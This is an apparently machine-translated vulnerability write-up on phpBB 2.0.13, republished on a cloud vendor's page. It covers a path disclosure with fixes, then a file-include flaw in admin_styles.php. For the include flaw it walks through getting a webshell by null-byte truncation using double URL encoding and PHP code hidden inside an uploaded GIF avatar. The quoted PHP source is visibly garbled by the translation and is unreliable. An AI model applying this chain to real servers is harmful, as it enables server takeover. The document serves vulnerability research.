Research on the solution of PhpBB 2.0.13 discovered vulnerabilities

Source: Internet
Author: User
Tags pear php file php code oracle database
First, Path disclosure
Vulnerability file:/db/oracle.php
Vulnerability Description: Direct access to oracle.php, resulting in exposure to web paths
Involved version: phpBB <=2.013
Test: IE commit http://127.0.0.1/phpBB2/db/oracle.php return error:
Fatal error:cannot redeclare sql_nextid () in f:\easyphp1-7\www\phpbb2\db\oracle.php to line 405

Solutions
If you are not using Oracle database, you can remove oracle.php directly
Modify php.ini settings: Display_errors = Off
Second, Remote PHP File Include
Vulnerability file:/admin/admin_styles.php
Vulnerability Description: admin_styles.php file in the variable filtering is not strict, resulting in malicious code from the background, thereby dangerous server security
Involved version: phpBB <=2.013+ php <5.0
Vulnerability Analysis:
The case "AddNew":
$install _to = (isset ($HTTP _get_vars[install_to])? UrlDecode ($HTTP _get_vars[install_to]): $HTTP _post_vars[install_to];
$style _name = (isset ($HTTP _get_vars[style]))? UrlDecode ($HTTP _get_vars[style]): $HTTP _post_vars[style];
74
if (Isset ($install _to))
76 {
77
_root_path include ($phpbb. "Templates/". $install _to. "/theme_info.cfg");
79
$template _name = $install _to;
Bayi $found = FALSE;

$install _to variable filtering is not strict, resulting in include ($phpbb _root_path. "Templates/". $install _to. "/theme_info.cfg"); The intruder can reach the attack by constructing $install _to
Objective
Test Analysis (Purpose: Get webshelll from Backstage):
First, we'll just look at 78 lines of code.
_root_path include ($phpbb. "Templates/". $install _to. "/theme_info.cfg");

The include finally executes the theme_info.cfg file, Theme_info.cfg is a few settings for saving "style" if we can get in from theme_ Info.cfg file into malicious code, we execute our code directly through include:) [thought reference from backstage to Webshell a little thought] we test:
Background style management--> management options---> Edit-->css style table input ";p hpinfo ();" (can also be inserted by other variables), and then the output setting was successfully saved to theme_info.cfg file
We are opening theme_info.cfg to see:
$subSilver [0][head_stylesheet] = "Subsilver.css\";p hpinfo (); \ "";

Depressed "was filtered, I was in MAGIC_QUOTES_GPC = off the test appears phpbb itself to do filtration, blocked:(
There is a vulnerability to null truncation in PHP for <5.0 (excluding 4.10):
-------------------------------vulnerability specifically depicts the start-------------------------------
There is an input validation vulnerability in PHP that remote attackers can use to read the contents of system files and perform directory traversal attacks.
Problem one is that there is a problem with addslashes (), addslashes () is used to filter user input, and when MAGIC_QUOTES_GPC is set "on", the Addslashes () is filtered for each input. However, because null bytes are incorrectly encoded by addslashes (), if user input is used by include () or require (), it could cause an attacker to read arbitrary files on the file system.
Problem two is the upload path traversal problem, PHP automatically filters uploaded file name data, delete the data before the slash or backslash, but if the attacker uploads the file containing single quotes, and the Web service sets Magic_quotes to ON, or executes addslashes on the uploaded file name () Operation, a backslash is preceded by a single quotation mark, so a directory traversal problem can occur in the Windows system, causing the file to be uploaded to any directory on the system.
Warning:main (./..) /TEMPLATES/THEME_INFO.CFG\0/THEME_INFO.CFG): Failed to open stream:no such file or directory in F:\EASYPHP1-7\WWW\PHPBB2 \admin\admin_styles.php on line 78
Warning:main (): Failed opening. /templates/theme_info.cfg\0/theme_info.cfg for inclusion (include_path=.; f:\EasyPHP1-7\php\pear\) in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7

%00 changed from \0,phpbb is metamorphosis, since%00 not we see 72 lines of code:
$install _to = (isset ($HTTP _get_vars[install_to])? UrlDecode ($HTTP _get_vars[install_to]): $HTTP _post_vars[install_to];

We use IE to submit the way is get so we submit the &install_to, to be urldecode () parsing, then we can first%00 URL encoding once:%25%30%30 submit:
http://127.0.0.1/phpBB2/a......6eb9ea1e43e62cbd634

Return:
Warning:main (./..) /TEMPLATES/THEME_INFO.CFG): Failed to open stream:no such file or directory in F:\easyphp1-7\www\phpbb2\admin\admin_styl Es.php on line 78
Warning:main (): Failed opening. /templates/theme_info.cfg for inclusion (include_path=.; f:\EasyPHP1-7\php\pear\) in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7

Note and%00 comparison
%00---> main (./.. /TEMPLATES/THEME_INFO.CFG\0/THEME_INFO.CFG)
%25%30%30---> Warning:main (./.. /TEMPLATES/THEME_INFO.CFG)

Haha include successfully truncated, then we can take advantage of. /to invoke easy file slightly:)
Specific use
We save the Phpshell code as a GIF or other picture format, which is called and executed by the include () in the Forum upload and then using the construction install_to.
Here Phpshell code code uses save for 1.gif we upload images to Http://127.0.0.1/phpBB2/profile.php?mode=editprofile
Error returned: The Avatar filetype must be. jpg,. gif or. png

As shown in Figure 1
We all know that the picture file has his "special logo", with Uedit and other editing tools you can find such as GIF file at the beginning of the "gif89a" seems to phpbb in the judgement suffix after the use of getimagesize () or similar function to judge, then how do we bypass it? Note that the GIF file has a "0000 ..." tail. Empty data area, we can write PHP code into this.

As shown in Figure 2

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.